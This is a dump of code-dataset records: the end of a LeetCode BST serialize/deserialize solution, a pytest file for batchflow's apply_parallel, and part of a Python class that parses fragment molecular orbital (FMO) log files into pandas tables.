Returns:\n\n \"\"\"\n postorder = []\n\n def rec(node):\n if not node:\n return\n rec(node.left)\n rec(node.right)\n postorder.append(str(node.val))\n\n rec(root)\n return ','.join(postorder)\n\n def deserialize(self, data: str) -> TreeNode:\n \"\"\"Decodes your encoded data to tree.\n \"\"\"\n return self.postorder_deserialize(data)\n\n def preorder_deserialize(self, data: str) -> TreeNode:\n \"\"\"\n A pre-order deserialization method that runs in O(N^2) in time and O(N) in\n space\n\n Args:\n data:\n\n Returns:\n\n \"\"\"\n inorder, preorder = data.split(':')\n if not inorder or not preorder:\n return None\n\n inorder = [int(v) for v in inorder.split(',')]\n preorder = deque([int(v) for v in preorder.split(',')])\n\n def rec(nums):\n if not nums:\n return None\n val = preorder.popleft()\n pivot = nums.index(val)\n node = TreeNode(val)\n node.left = rec(nums[:pivot])\n node.right = rec(nums[pivot + 1:])\n return node\n\n return rec(inorder)\n\n def postorder_deserialize(self, data: str) -> TreeNode:\n \"\"\"\n A post-order deserialization method that runs in O(N) in time and space\n\n Args:\n data:\n\n Returns:\n\n \"\"\"\n if not data:\n return None\n stack = [int(v) for v 
in data.split(',')]\n\n def rec(lower, upper):\n if not stack or stack[-1] < lower or stack[-1] > upper:\n return None\n val = stack.pop()\n node = TreeNode(val)\n node.right = rec(val, upper)\n node.left = rec(lower, val)\n return node\n\n return rec(float('-inf'), float('inf'))\n\n# Your Codec object will be instantiated and called as such:\n# codec = Codec()\n# codec.deserialize(codec.serialize(root))","repo_name":"KKosukeee/CodingQuestions","sub_path":"LeetCode/449_serialize_and_deserialize_bst.py","file_name":"449_serialize_and_deserialize_bst.py","file_ext":"py","file_size_in_byte":3806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41000937270","text":"# pylint: disable=redefined-outer-name, missing-docstring\nimport sys\n\nimport pytest\nimport numpy as np\n\nsys.path.append('..')\nfrom batchflow import Dataset, Batch, apply_parallel, B\n\n\nclass MyBatch(Batch):\n components = 'images', 'masks'\n\n @apply_parallel\n def ap_test(self, item, param, **kwargs):\n _ = kwargs\n if isinstance(item, tuple):\n return item[0] * param + item[1] * param\n return item * param\n\n @apply_parallel(requires_rng=True)\n def ap_requires_rng_test(self, item, rng=None, **kwargs):\n _ = kwargs\n if isinstance(item, tuple):\n return item[0] + item[1] + rng.uniform()/CONST + CONST\n return item + rng.uniform()\n\n\nBATCH_SIZE = 8\nARRAY_INIT = np.arange(BATCH_SIZE).reshape((-1, 1))\nCONST = 42\n\n\n@pytest.mark.parametrize('src_dst', [\n ('images', 'masks'),\n (['images', 'masks'], ['outputs1', 'outputs2']),\n (('images', 'masks'), 'outputs'),\n])\ndef test_apply_parallel(src_dst):\n \"\"\" Check `apply_parallel` is evaluated properly \"\"\"\n src, dst = src_dst\n\n pipeline = (Dataset(10, MyBatch)\n .pipeline()\n .update(B.images, ARRAY_INIT)\n .update(B.masks, ARRAY_INIT)\n .ap_test(src=src, dst=dst, param=CONST)\n )\n\n b = pipeline.next_batch(BATCH_SIZE)\n\n if isinstance(src, str):\n assert (getattr(b, src) * CONST == getattr(b, dst)).all()\n elif isinstance(src, list):\n for src_, dst_ in zip(src, dst):\n assert (getattr(b, src_) * CONST== getattr(b, dst_)).all()\n elif isinstance(src, tuple):\n assert (ARRAY_INIT * CONST * 2 == b.outputs).all()\n\n\n@pytest.mark.parametrize('src_dst', [\n ('images', 'masks'),\n (['images', 'images'], ['outputs1', 'outputs2']),\n (('images', 'masks'), 'outputs'),\n])\ndef test_apply_parallel_requires_rng(src_dst):\n \"\"\" Check that `rng`, supplied by applied parallel, works and\n reproduces the same results for each `src` in a list.\n \"\"\"\n src, dst = src_dst\n\n pipeline = (Dataset(10, MyBatch)\n .pipeline()\n .update(B.images, ARRAY_INIT)\n .update(B.masks, ARRAY_INIT)\n .ap_requires_rng_test(src=src, dst=dst)\n )\n\n b = pipeline.next_batch(BATCH_SIZE)\n\n if isinstance(src, str):\n assert (getattr(b, src) != getattr(b, dst)).any()\n assert np.allclose(getattr(b, src), getattr(b, dst), atol=1)\n elif isinstance(src, list):\n assert (getattr(b, dst[0]) == getattr(b, dst[1])).all()\n elif isinstance(src, tuple):\n assert np.allclose(b.outputs, ARRAY_INIT * 2 + CONST, atol=1/CONST)\n\ndef test_apply_parallel_requires_rng_fixed_seed():\n \"\"\" Check that `shuffle`, supplied at pipeline run, produces the same results for multiple runs. 
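Two pipelines built and run with the same seed (here shuffle=42) must therefore produce the same random draws and the same outputs. 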
\"\"\"\n pipeline = (Dataset(10, MyBatch)\n .pipeline()\n .update(B.images, ARRAY_INIT)\n .update(B.masks, ARRAY_INIT)\n .ap_requires_rng_test(src='images', dst='outputs')\n )\n b = pipeline.next_batch(BATCH_SIZE, shuffle=42)\n value1 = b.random.uniform()\n outputs1 = b.outputs\n\n pipeline = (Dataset(10, MyBatch)\n .pipeline()\n .update(B.images, ARRAY_INIT)\n .update(B.masks, ARRAY_INIT)\n .ap_requires_rng_test(src='images', dst='outputs')\n )\n b = pipeline.next_batch(BATCH_SIZE, shuffle=42)\n value2 = b.random.uniform()\n outputs2 = b.outputs\n\n assert value1 == value2\n assert (outputs1 == outputs2).all()\n","repo_name":"analysiscenter/batchflow","sub_path":"batchflow/tests/apply_parallel_test.py","file_name":"apply_parallel_test.py","file_ext":"py","file_size_in_byte":3408,"program_lang":"python","lang":"en","doc_type":"code","stars":194,"dataset":"github-code","pt":"21"} +{"seq_id":"42945288274","text":"import sys\nimport os\nscrdir = os.path.abspath(os.path.dirname(__file__))\nsys.path.append(scrdir)\n\nfrom multiprocessing import Pool\nimport copy\nimport random\nimport math\nimport re\nimport subprocess\nimport csv\nimport pdb_io as pdio\nimport time\nfrom ctypes import *\n\ntry:\n import numpy as np\nexcept:\n pass\ntry:\n import collections\nexcept:\n pass\ntry:\n import pandas as pd\nexcept:\n pass\ntry:\n import itertools\nexcept:\n pass\n\nclass anlfmo(pdio.pdb_io):\n def __init__(self):\n super().__init__()\n self.cpfflag = True\n self.solv_flag = False # True -> in water , False -> in vacuum\n self.abinit_ver = True\n self.memory = 3000\n self.npro = 8\n self.para_job = 1\n self.cutmode = 'sphere'\n self.abinit_ver = 'rev11'\n self.piedaflag = True\n self.molname = []\n self.criteria = []\n self.tgtpos = []\n self.icolumn = ['I', 'J', 'DIST', 'DIMER-ES', 'HF-IFIE', 'MP2-IFIE',\n 'PR-TYPE1', 'GRIMME', 'JUNG', 'HILL']\n self.bicolumn = ['I', 'J', 'DIST', 'DIMER-ES-BSSE', 'HF-BSSE',\n 'MP2-BSSE', 'PR-T1-BSSE', 'GRIMME-BSSE',\n 'JUNG-BSSE', 'HILL-BSSE']\n self.pcolumn = ['I', 'J', 'ES', 'EX', 'CT-mix', 'DI(MP2)', 'q(I=>J)']\n self.pcolumnpb = ['I', 'J', 'ES', 'EX', 'CT-mix', 'Solv(ES)',\n 'DI(MP2)', 'q(I=>J)']\n self.ifdfsumcolumn = ['HF-IFIE', 'MP2-IFIE', 'PR-TYPE1',\n 'GRIMME', 'JUNG', 'HILL', 'ES',\n 'EX', 'CT-mix', 'DI(MP2)', 'q(I=>J)']\n self.logMethod = 'MP2'\n\n self.anlmode = 'frag' # frag, 'mol', 'fraginmol', 'multi'\n self.fragmode = 'auto' # 'hybrid', 'auto', 'manual'\n self.dist = 1000.0\n self.tgt1frag = None\n\n self.rpdbflag = False\n self.pdbname = None\n self.is_disp = False\n\n # -- for mol mode or multi mode--\n self.tgt2type = 'frag' # frag: mol-frag, mol: mol-mol\n\n # mol - mol mode\n self.selecttype = 'molid'\n self.tgtmolid = None\n\n # -- fraginmol mode --\n self.tgt1_lofrag = None\n self.tgt2_lofrag = None\n self.tgt2molname = None\n # ------ multi mode ------\n # if tgt2type == 'frag':\n self.ifdfs = []\n self.pidfs = []\n self.tgt1frag = None\n self.tgt2frag = None\n\n # if tgt2type == 'molname':\n self.tgt2dist = None\n\n # multi file setting\n self.ilog_head = None\n self.ilog_tail = None\n self.pdb_head = None\n self.pdb_tail = None\n\n self.start = None\n self.end = None\n self.interval = None\n\n # --hybrid mode\n self.hyfrag = None # 320\n self.hynum = None\n\n self.pynp = 3\n self.addresinfo = True\n self.writeresnamecsv = True\n\n mydir = os.path.dirname(os.path.abspath(__file__))\n self.f90sofile = mydir + '/f90/bin/readifiepiedalib.so'\n self.f90soflag = True\n\n # for svd\n self.matrixtype = 'normal'\n self.exceptfrag = []\n\n 
self.pbflag = False\n self.nf = 0\n pass\n\n def read_fraginfo(self, fname):\n frags = []\n count = 0\n with open(fname, 'r') as file:\n flag = False\n while True:\n # for i in range(len(text)):\n # itemList = text[i][:-1].split()\n itemList = file.readline().strip().split()\n print(itemList)\n if len(itemList) < 2:\n continue\n if itemList[1] == 'AUTOMATIC' or itemList[1] == 'HYBRID':\n flag = True\n continue\n if itemList[1] == 'MANUAL':\n manflag = True\n if itemList[1] == 'system' or itemList[0] == 'Ions':\n print('read end')\n break\n if flag is True:\n count += 1\n if flag is True and count > 2:\n if self.fragmode == 'hybrid':\n frags.append(itemList[3] + itemList[1])\n elif self.fragmode == 'auto':\n frags.append(itemList[2] + itemList[0])\n\n return frags\n\n def read_pieda(self, fname):\n ifie = []\n count = 0\n text = open(fname, \"r\").readlines()\n flag = False\n # print text\n for i in range(len(text)):\n itemList = text[i][:-1].split()\n # print itemList\n if len(itemList) < 2:\n continue\n if itemList[1] == 'PIEDA':\n flag = True\n # head.append(itemList)\n continue\n if itemList[1] == 'Mulliken':\n # flag = False\n break\n if flag is True:\n count += 1\n if flag is True and count > 2:\n ifie.append(itemList)\n\n return ifie\n\n def getconnect(self, idxs, molfrags, df, tgtid):\n '''getconnect\n\n get connect info\n\n Args:\n idxs (list): index list\n molfrags (list): molfrag list\n df (DataFrame): ifie DataFrame\n tgtid (int): target id\n Returns:\n newfrags (list): new frag list\n molfrags (list): molfrag list\n '''\n\n neighbors_list = []\n # print(idxs)\n for idx in idxs:\n tgtdf = df[df['I'] == idx]\n tgtdf = tgtdf.append(df[df['J'] == idx])\n tgtdf_zero = tgtdf[tgtdf['DIST'] == 0.]\n # print(tgtdf_zero)\n neighbor_i = [index for index, row in tgtdf_zero.groupby(\"I\")]\n neighbor_j = [index for index, row in tgtdf_zero.groupby(\"J\")]\n neighbors = set(neighbor_i + neighbor_j)\n # print('connect_idx', neighbors)\n neighbors_list.append(neighbors)\n neighbors_flat = list(itertools.chain.from_iterable(neighbors_list))\n # print(idx)\n\n newfrags = []\n for idx in neighbors_flat:\n if idx == tgtid:\n if self.anlmode != 'fraginmol':\n continue\n if idx not in molfrags:\n molfrags.append(idx)\n newfrags.append(idx)\n\n return newfrags, molfrags\n\n def getmolfrags(self, tgtid, df):\n '''getmolfrags\n\n get molfrag list\n\n Args:\n tgtid (int): target id\n df (DataFrame): ifie DataFrame\n Returns:\n molfrags (list): molfrag list\n '''\n\n molfrags = [tgtid]\n newfrags = [tgtid]\n while True:\n newfrags, molfrags = self.getconnect(newfrags, molfrags, df, tgtid)\n # print (newfrags, molfrags)\n if len(newfrags) == 0:\n break\n molfrags.sort()\n # print('aaa', molfrags)\n\n return molfrags\n\n def getallmolfrags(self, logname, df, nf):\n # fragment connect is judged by checking frag-frag distance\n alfrags = []\n molfragss = []\n for i in range(1, nf+1):\n if i in alfrags:\n # print(i, 'already')\n continue\n molfrags = self.getmolfrags(i, df)\n molfragss.append(molfrags)\n for j in molfrags:\n alfrags.append(j)\n # print(molfragss)\n return molfragss\n\n def getlognf(self, logname, fragmode):\n # print('fragmode', fragmode)\n if fragmode == 'manual':\n text = open(logname, \"r\").readlines()\n for i in range(len(text)):\n itemList = text[i][:-1].split()\n # print(itemList)\n if len(itemList) < 2:\n continue\n if itemList[:2]== ['NF', '=']:\n nf = int(itemList[2])\n break\n if fragmode == 'auto':\n f = open(logname, 'r')\n readflag = False\n autoreadflag = False\n fragdata = 
[]\n fragdatas = []\n elecs = []\n seqnos = []\n fragnos = []\n residuestr = []\n logreadGeom = []\n pdbabs = \"\"\n\n for line in f:\n items = line[1:].split()\n chains = line[0]\n if len(items) == 0:\n continue\n\n if items[0] == 'ReadGeom':\n logreadGeom = items[2]\n\n if items[0] == 'AutoFrag':\n if items[2] == 'ON':\n self.fragmode = 'auto'\n else:\n self.fragmode = 'manual'\n\n # read frag table\n # if len(items) == 3:\n # print (items)\n if items[0:3] == ['Frag.', 'Elec.', 'ATOM']:\n readflag = True\n # print('# readflag ON #')\n continue\n if items[0:2] == [\"ALL\", \"ELECTRON\"]:\n fragdatas.append(fragdata)\n readflag = False\n if items[0:2] == [\"ALL\", \"ATOM\"]:\n natom = int(items[3])\n if readflag is True:\n if line[0:21] == \" \":\n # print(line)\n fragdata = fragdata + items\n else:\n if len(fragdata) != 0:\n fragdatas.append(fragdata)\n elecs.append(int(elec))\n fragdata = []\n elec = items[1]\n fragdata = fragdata + items[2:]\n\n if items [0:2] == ['START', 'FRAGMENT']:\n break\n\n ## AUTOMATIC FRAGMENTATION\n if items[0:3] == ['Seq.', 'Frag.', 'Residue']:\n autoreadflag = True\n continue\n\n if autoreadflag == True and items[0:2] == ['The', 'system']:\n autoreadflag = False\n continue\n\n if autoreadflag == True and items[0] == 'Ions':\n autoreadflag = False\n continue\n\n if autoreadflag == True:\n # print(items)\n seqnos.append(items[0])\n fragnos.append(items[1])\n residuestr.append(items[2])\n\n nf = len(fragdatas)\n # print('-------nf--------', nf)\n # print(fragdatas)\n\n return nf\n\n def readlog(self, logname, fragmode):\n # print('fragmode', fragmode)\n if fragmode == 'manual':\n text = open(logname, \"r\").readlines()\n for i in range(len(text)):\n itemList = text[i][:-1].split()\n # print(itemList)\n if len(itemList) < 2:\n continue\n if itemList[:2]== ['NF', '=']:\n nf = int(itemList[2])\n break\n if fragmode == 'auto':\n f = open(logname, 'r')\n readflag = False\n autoreadflag = False\n fragdata = []\n fragdatas = []\n elecs = []\n seqnos = []\n fragnos = []\n residuestr = []\n logreadGeom = []\n pdbabs = \"\"\n\n for line in f:\n items = line[1:].split()\n chains = line[0]\n if len(items) == 0:\n continue\n\n if items[0] == 'ReadGeom':\n logreadGeom = items[2]\n\n if items[0] == 'AutoFrag':\n if items[2] == 'ON':\n self.fragmode = 'auto'\n else:\n self.fragmode = 'manual'\n\n # read frag table\n # if len(items) == 3:\n # print (items)\n if items[0:3] == ['Frag.', 'Elec.', 'ATOM']:\n readflag = True\n # print('# readflag ON #')\n continue\n if items[0:2] == [\"ALL\", \"ELECTRON\"]:\n fragdatas.append(fragdata)\n readflag = False\n if items[0:2] == [\"ALL\", \"ATOM\"]:\n natom = int(items[3])\n if readflag == True:\n if line[0:21] == \" \":\n # print(line)\n fragdata = fragdata + items\n else:\n if len(fragdata) != 0:\n fragdatas.append(fragdata)\n elecs.append(int(elec))\n fragdata = []\n elec = items[1]\n fragdata = fragdata + items[2:]\n\n if items [0:2] == ['START', 'FRAGMENT']:\n break\n\n ## AUTOMATIC FRAGMENTATION\n if items[0:3] == ['Seq.', 'Frag.', 'Residue']:\n autoreadflag = True\n continue\n\n if autoreadflag == True and items[0:2] == ['The', 'system']:\n autoreadflag = False\n continue\n\n if autoreadflag == True and items[0] == 'Ions':\n autoreadflag = False\n continue\n\n if autoreadflag == True:\n # print(items)\n seqnos.append(items[0])\n fragnos.append(items[1])\n residuestr.append(items[2])\n\n nf = len(fragdatas)\n print('-------nf--------', nf)\n\n return natom\n\n def getlognatom(self, fname):\n acount = 0\n flag = False\n f 
=open(fname, \"r\")\n text = f.readlines()\n for i in range(len(text)):\n itemList = text[i].split()\n if itemList[0:4] == ['##', 'READ', 'MOLECULAR', 'STRUCTURE']:\n flag = True\n continue\n if flag:\n if itemList[0:3] == ['##', 'Molecular', 'formula']:\n break\n elif len(itemList) <= 1:\n continue\n else:\n acount += 1\n return acount\n\n\n def getlogchg(self, fname, natom):\n chgs = []\n f =open(fname, \"r\")\n text = f.readlines()\n for i in range(len(text)):\n itemList = text[i].split()\n # MO\n if itemList == ['TWO-STAGE', 'RESP', 'FITTING:', 'SECOND', 'STAGE']:\n for j in range(int(natom)):\n chgval = text[i+20+j].split()\n chgs.append(float(chgval[2]))\n\n # FMO\n if itemList == ['##', 'ESP-FITTING', 'TYPE:', 'RESP']:\n for j in range(int(natom)):\n chgval = text[i+6+j].split()\n chgs.append(float(chgval[4]))\n return chgs\n\n\n def getlogchgall(self, fname, natom, chgtype):\n alabs = []\n elems = []\n ress = []\n frags = []\n chgs = []\n pops = []\n f =open(fname, \"r\")\n text = f.readlines()\n if chgtype == 'nbo':\n for i in range(len(text)):\n itemList = text[i].split()\n # FMO\n if itemList == ['##', 'NATURAL', 'ATOMIC', 'POPULATIONS']:\n for j in range(int(natom)):\n chgval = text[i+6+j].split()\n alabs.append(int(chgval[0]))\n elems.append(str(chgval[1]))\n ress.append(int(chgval[2]))\n frags.append(int(chgval[3]))\n chgs.append(float(chgval[4]))\n pops.append(float(chgval[5]))\n chgdf=pd.DataFrame({'AtomLabel':alabs,\n 'Elem': elems,\n 'Res': ress,\n 'Frag': frags,\n 'Charge': chgs,\n 'Pop': pops})\n else:\n print('Options except A are not supported yet.')\n sys.exit()\n return chgdf\n\n '''\n ========================================================\n ## NATURAL POPULATION ANALYSIS -- Ver.2.73(20131003)\n ========================================================\n\n\n ## NATURAL ATOMIC POPULATIONS\n\n -----------------------------------------\n Atom Res Frag Charge Pop\n FMO2-HF FMO2-HF\n -----------------------------------------\n 1 N 1 1 -0.801541 7.801541\n 2 C 1 1 -0.108078 6.108078\n 3 C 1 2 0.847514 5.152486\n 4 O 1 2 -0.776786 8.776786\n 5 C 1 1 -0.669410 6.669410\n 6 H 1 1 0.461111 0.538889\n '''\n\n def getlogorpdbfrag(self, ifile):\n\n f = open(ifile, 'r')\n readflag = False\n autoreadflag = False\n fragdata = []\n fragdatas = []\n elecs = []\n seqnos = []\n fragnos = []\n residuestr = []\n logreadGeom = []\n pdbabs = \"\"\n\n for line in f:\n items = line[1:].split()\n chains = line[0]\n if len(items) == 0:\n continue\n\n if items[0] == 'ReadGeom':\n logreadGeom = items[2]\n\n if items[0] == 'AutoFrag':\n if items[2] == 'ON':\n self.fragmode = 'auto'\n else:\n self.fragmode = 'manual'\n\n # read frag table\n if items[0:3] == ['Frag.', 'Elec.', 'ATOM']:\n readflag = True\n continue\n if items[0:2] == [\"ALL\", \"ELECTRON\"]:\n fragdatas.append(fragdata)\n readflag = False\n if items[0:2] == [\"ALL\", \"ATOM\"]:\n natom = int(items[3])\n if readflag == True:\n if line[0:21] == \" \":\n # print(line)\n fragdata = fragdata + items\n else:\n if len(fragdata) != 0:\n fragdatas.append(fragdata)\n elecs.append(int(elec))\n fragdata = []\n elec = items[1]\n fragdata = fragdata + items[2:]\n\n if items [0:2] == ['START', 'FRAGMENT'] or items[0] == 'Ions':\n break\n\n ## AUTOMATIC FRAGMENTATION\n if items[0:3] == ['Seq.', 'Frag.', 'Residue']:\n autoreadflag = True\n continue\n\n if autoreadflag == True and items[0:2] == ['The', 'system']:\n autoreadflag = False\n continue\n\n if autoreadflag == True:\n # print(items)\n seqnos.append(items[0])\n fragnos.append(items[1])\n 
residuestr.append(items[2])\n\n\n nf = len(fragdatas)\n # print('natom', natom)\n # print('nf', len(fragdatas))\n\n na_nfrag = []\n for i in range(len(fragdatas)):\n na_nfrag.append(len(fragdatas[i]))\n # print('na_nfrag\\n', na_nfrag)\n\n # print('Elec.\\n', elecs)\n # print('logreadGeom:', logreadGeom)\n\n # print(pdbabs)\n # print('Frag Atom number\\n', fragdatas)\n\n resname_perfrag = []\n resnamenonum_perfrag = []\n if self.fragmode == 'manual':\n logabsitems = os.path.abspath(ifile).split('/')\n logabsitems[-1] = logreadGeom\n # print(logabsitems)\n pdbabs = \"\"\n for logabsitem in logabsitems:\n pdbabs = pdbabs + logabsitem + '/'\n\n pdbabs = pdbabs[:-1]\n\n ## manual\n\n self.getpdbinfowrap(pdbabs)\n # print(self.resnameRes)\n tgts = []\n for fragdata in fragdatas:\n try:\n tgts.append(fragdata[2])\n except:\n tgts.append(fragdata[0])\n\n for tgt in tgts:\n for i in range(len(self.gatmlabRes)):\n gatmlabs = self.gatmlabRes[i]\n # print(gatmlabs)\n tgtstr = str(tgt).rjust(5)\n if tgtstr in gatmlabs:\n headid = [i, gatmlabs.index(tgtstr)]\n resname_perfrag.append(self.resnameRes[headid[0]][headid[1]] + self.resnumRes[headid[0]][headid[1]].strip())\n resnamenonum_perfrag.append(self.resnameRes[headid[0]][headid[1]])\n\n\n # print(resname_perfrag)\n\n ## auto\n # AUTOMATIC FRAGMENTATION\n if self.fragmode == 'auto':\n alreadys = []\n for i in range(len(fragnos)):\n if fragnos[i] in alreadys:\n continue\n else:\n resname_perfrag.append(residuestr[i] + seqnos[i])\n resnamenonum_perfrag.append(residuestr[i])\n alreadys.append(fragnos[i])\n# print('resname_perfrag', resname_perfrag)\n\n self.resnamenonum_perfrag = resnamenonum_perfrag\n return resname_perfrag, pdbabs\n\n\n def getifiedf(self, ifie, solv=[]):\n '''get ifie data frame from ifie file\n\n get ifie data frame from ifie file\n\n Args:\n ifie (str): ifie file name\n solv (list): solvent name list\n\n Returns:\n df (pandas.DataFrame): ifie data frame\n '''\n\n df = pd.DataFrame(ifie, columns=self.icolumn)\n df['I'] = df['I'].astype(int)\n df['J'] = df['J'].astype(int)\n df['DIST'] = df['DIST'].astype(float)\n df['HF-IFIE'] = df['HF-IFIE'].astype(float) * 627.5095\n\n if self.logMethod == 'MP2':\n df['MP2-IFIE'] = df['MP2-IFIE'].astype(float) * 627.5095\n df['PR-TYPE1'] = df['PR-TYPE1'].astype(float) * 627.5095\n df['GRIMME'] = df['GRIMME'].astype(float) * 627.5095\n df['JUNG'] = df['JUNG'].astype(float) * 627.5095\n df['HILL'] = df['HILL'].astype(float) * 627.5095\n\n # print('solv', solv)\n if len(solv) != 0:\n solvdf = pd.DataFrame(solv, columns=['I', 'J', 'Solv(ES)'])\n solvdf['I'] = solvdf['I'].astype(int)\n solvdf['J'] = solvdf['J'].astype(int)\n solvdf['Solv(ES)'] = solvdf['Solv(ES)'].astype(float)\n\n # print(df.head())\n # print(solvdf.head())\n df = pd.merge(df, solvdf, on=['I', 'J'], how='left')\n print(df.head())\n return df\n\n\n def getbssedf(self, ifie, solv=[]):\n '''get bsse data frame from ifie file\n\n get bsse data frame from ifie file\n\n Args:\n ifie (str): ifie file name\n solv (list): solvent name list\n\n Returns:\n df (pandas.DataFrame): bsse data frame\n '''\n\n df = pd.DataFrame(ifie, columns=self.bicolumn)\n df['I'] = df['I'].astype(int)\n df['J'] = df['J'].astype(int)\n df['DIST'] = df['DIST'].astype(float)\n df['HF-BSSE'] = df['HF-BSSE'].astype(float) * 627.5095\n\n if self.logMethod == 'MP2':\n df['MP2-BSSE'] = df['MP2-BSSE'].astype(float) * 627.5095\n df['PR-T1-BSSE'] = df['PR-T1-BSSE'].astype(float) * 627.5095\n df['GRIMME-BSSE'] = df['GRIMME-BSSE'].astype(float) * 627.5095\n df['JUNG-BSSE'] = 
df['JUNG-BSSE'].astype(float) * 627.5095\n            df['HILL-BSSE'] = df['HILL-BSSE'].astype(float) * 627.5095\n\n        df = df.drop(columns='DIST')\n        # print(df.head())\n        return df\n\n    def getpiedadf(self, pieda):\n        # print('l669', pieda[1])\n        pidf = pd.DataFrame(pieda, columns=self.pcolumn)\n        pidf['I'] = pidf['I'].astype(int)\n        pidf['J'] = pidf['J'].astype(int)\n        pidf['ES'] = pidf['ES'].astype(float)\n        pidf['EX'] = pidf['EX'].astype(float)\n        pidf['CT-mix'] = pidf['CT-mix'].astype(float)\n        if self.abinit_ver == 'rev16' or self.abinit_ver == 'rev17':\n            pidf['Solv(ES)'] = pidf['Solv(ES)'].astype(float)\n        pidf['DI(MP2)'] = pidf['DI(MP2)'].astype(float)\n        pidf['q(I=>J)'] = pidf['q(I=>J)'].astype(float)\n        return pidf\n\n    def getmomenedf(self, momene):\n        df = pd.DataFrame(momene, columns=['Frag.', 'HF', 'MP2'])\n        df['Frag.'] = df['Frag.'].astype(int)\n        df['HF'] = df['HF'].astype(float)\n        df['MP2'] = df['MP2'].astype(float)\n        return df\n\n    def getdimenedf(self, dimene):\n        df = pd.DataFrame(dimene, columns=['I', 'J', 'DIMER-HF', 'DIMER-MP2'])\n        df['I'] = df['I'].astype(int)\n        df['J'] = df['J'].astype(int)\n        df['DIMER-HF'] = df['DIMER-HF'].astype(float)\n        df['DIMER-MP2'] = df['DIMER-MP2'].astype(float)\n        return df\n\n    def getpbpiedadf(self, pieda):\n        pidf = pd.DataFrame(pieda, columns=self.pcolumnpb)\n        pidf['I'] = pidf['I'].astype(int)\n        pidf['J'] = pidf['J'].astype(int)\n        pidf['ES'] = pidf['ES'].astype(float)\n        pidf['EX'] = pidf['EX'].astype(float)\n        pidf['CT-mix'] = pidf['CT-mix'].astype(float)\n        pidf['Solv(ES)'] = pidf['Solv(ES)'].astype(float)\n        pidf['DI(MP2)'] = pidf['DI(MP2)'].astype(float)\n        pidf['q(I=>J)'] = pidf['q(I=>J)'].astype(float)\n        pidf.drop(columns=['Solv(ES)'], inplace=True)\n\n        return pidf\n\n\n    
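# Note on units and PIEDA columns: IFIE energies read from the log are in hartree and\n    # are converted above with 1 hartree = 627.5095 kcal/mol; the PIEDA components are\n    # used as read (ES = electrostatics, EX = exchange-repulsion, CT-mix = charge\n    # transfer plus higher-order mixing, DI(MP2) = dispersion).\n    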
def gettgtpidf_n2ffmatrix(self, mydf=None, is_pb=False):\n        print('\n--- generate pieda', str(self.tgt1frag), str(self.tgt2frag), 'ffmatrix ---\n')\n        esdf = pd.DataFrame(index=self.tgt2frag)\n        exdf = pd.DataFrame(index=self.tgt2frag)\n        ctdf = pd.DataFrame(index=self.tgt2frag)\n        count = 0\n\n        if mydf is None:\n            df = self.pidf\n        else:\n            df = mydf\n        for f1 in self.tgt1frag:\n            wodimesapr_id = []\n            tgtdf1 = df[(df['I'] == f1)].rename(columns={'I':'J', 'J':'I'})\n            tgtdf2 = df[(df['J'] == f1)]\n            tgtdf = tgtdf1.append(tgtdf2)\n            # print(tgtdf)\n\n            tgtfrags = copy.deepcopy(self.tgt2frag)\n            try:\n                tgtfrags.remove(f1)\n            except:\n                pass\n            tgtdf_filter = tgtdf[(tgtdf['I'].isin(tgtfrags)) | (tgtdf['J'].isin(tgtfrags))]\n\n            fragis = tgtdf_filter['I'].values.tolist()\n            fragjs = tgtdf_filter['J'].values.tolist()\n\n            # print(tgtdf_filter)\n            # pick up frag ids from I and J (IDs skipped by the dimer-ES approximation are absent here)\n            for i in range(len(fragis)):\n                if fragis[i] != f1:\n                    wodimesapr_id.append(fragis[i])\n                else:\n                    wodimesapr_id.append(fragjs[i])\n            # print('wodimesapr_id', wodimesapr_id)\n\n\n            hfifie = 0\n            mp2corr = 0\n            prmp2corr = 0\n\n            esbuf = tgtdf_filter['ES'].values.tolist()\n            exbuf = tgtdf_filter['EX'].values.tolist()\n            ctbuf = tgtdf_filter['CT-mix'].values.tolist()\n\n            # complement values from ifdf\n            es = []\n            ex = []\n            ct = []\n\n            print('check frag', f1, 'pieda info')\n            for i in range(len(self.tgt2frag)):\n                tgtid = self.tgt2frag[i]\n                # if tgtid == f1:\n                #     print('error!! target frag1 and target 2 is duplicate!!')\n                #     sys.exit()\n                if tgtid in wodimesapr_id:\n                    es.append(esbuf[wodimesapr_id.index(tgtid)])\n                    ex.append(exbuf[wodimesapr_id.index(tgtid)])\n                    ct.append(ctbuf[wodimesapr_id.index(tgtid)])\n                else:\n                    if is_pb:\n                        es.append(self.hfdf.loc[tgtid, str(f1)] - self.solvesdf.loc[tgtid, str(f1)])\n                    else:\n                        # print(tgtid, 'is no data')\n                        es.append(self.hfdf.loc[tgtid, str(f1)])\n                    ex.append(0.0)\n                    ct.append(0.0)\n\n            esdf[str(f1)] = es\n            exdf[str(f1)] = ex\n            ctdf[str(f1)] = ct\n\n            count += 1\n\n        print ('ES\n', esdf.head())\n        print ('EX\n', exdf.head())\n        print ('CT\n', ctdf.head())\n\n        self.esdf = esdf\n        self.exdf = exdf\n        self.ctdf = ctdf\n\n        return\n\n\n    def gettgtdf_n2ffmatrix(self, mydf=None):\n        # generate frags-frags matrix\n        print('\n--- generate ifie', str(self.tgt1frag), str(self.tgt2frag), 'ffmatrix---\n')\n        hfdf = pd.DataFrame(index=self.tgt2frag)\n        distdf = pd.DataFrame(index=self.tgt2frag)\n        solvesdf = pd.DataFrame(index=self.tgt2frag)\n\n        if mydf is None:\n            df = self.ifdf\n        else:\n            df = mydf\n        count = 0\n\n        if self.logMethod in ['MP2', 'HF+D']:\n            mp2corrdf = pd.DataFrame(index=self.tgt2frag)\n            prmp2corrdf = pd.DataFrame(index=self.tgt2frag)\n            mp2tdf = pd.DataFrame(index=self.tgt2frag)\n            prmp2tdf = pd.DataFrame(index=self.tgt2frag)\n\n            for f1 in self.tgt1frag:\n                fragids = []\n                tgtdf1 = df[(df['I'] == f1)].rename(columns={'I':'J', 'J':'I'})\n                tgtdf2 = df[(df['J'] == f1)]\n                tgtdf = tgtdf1.append(tgtdf2)\n                # print(tgtdf)\n\n                tgtfrags = copy.deepcopy(self.tgt2frag)\n                try:\n                    tgtfrags.remove(f1)\n                except:\n                    pass\n                tgtdf_filter = tgtdf[(tgtdf['I'].isin(tgtfrags)) | (tgtdf['J'].isin(tgtfrags))]\n\n                # print(tgtdf_filter.columns.tolist())\n                if f1 in self.tgt2frag:\n                    # print ([i for i in range(len(tgtdf_filter.columns))])\n                    adddf = pd.DataFrame([f1, f1]+ [0 for i in range(len(tgtdf_filter.columns)-2)], index=tgtdf_filter.columns).T\n                    tgtdf_filter = 